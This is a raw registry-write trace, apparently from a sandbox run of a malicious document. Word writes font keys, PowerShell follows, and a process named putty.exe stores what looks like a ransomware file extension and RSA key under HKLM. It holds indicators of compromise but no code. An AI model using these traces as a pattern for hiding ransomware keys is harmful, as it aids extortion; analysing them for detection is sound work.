HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Fixedsys
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Sans Serif
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Serif
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Small Fonts
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
System
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Terminal
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
0
3008
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
0
2292
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2292
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
2292
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
2292
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
2292
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
2292
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
2292
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
2292
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
2292
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
2292
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
2292
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
2292
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
2292
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
2292
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2292
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\ex_data\data
ext
2E00790068007A0073006E006F006E00650075000000
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
public
0602000000A400005253413100080000010001005D4A6E8373C3BDA6BFE78059DCDC1A7C6A81AA02ECD528B34ED91D17599977A34228C298BB0C42C59177CF0669B05EAE3E1EC6DD178E4860F7CD8A0A6B14685B7CD544DABBAAC3028725A77D155953722D2BB1B07D652DC28D6B1BFFF326744F19FC07A8EE88545FAD56820FA07A43A0669827D7C7062D5C8655530B544122AD3A555F787CBA961B36D62B4C6FBC9D3603FB088F67C648AF2D39CF502C4839C34D4A3AC0FF1F0B9C4B578F3AECCDB0ADDD08DB23DEC904BD533B6C8220E955B646DEB4315490F301AE93D9D99F01CBAE996201F9348C8FAD098AD132371A5455DA59402E1BC172BF6F37F24FCD6E999F1687DE753701DBF1B4F0FA5665FD01AB
3020
putty.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\keys_data\data
private
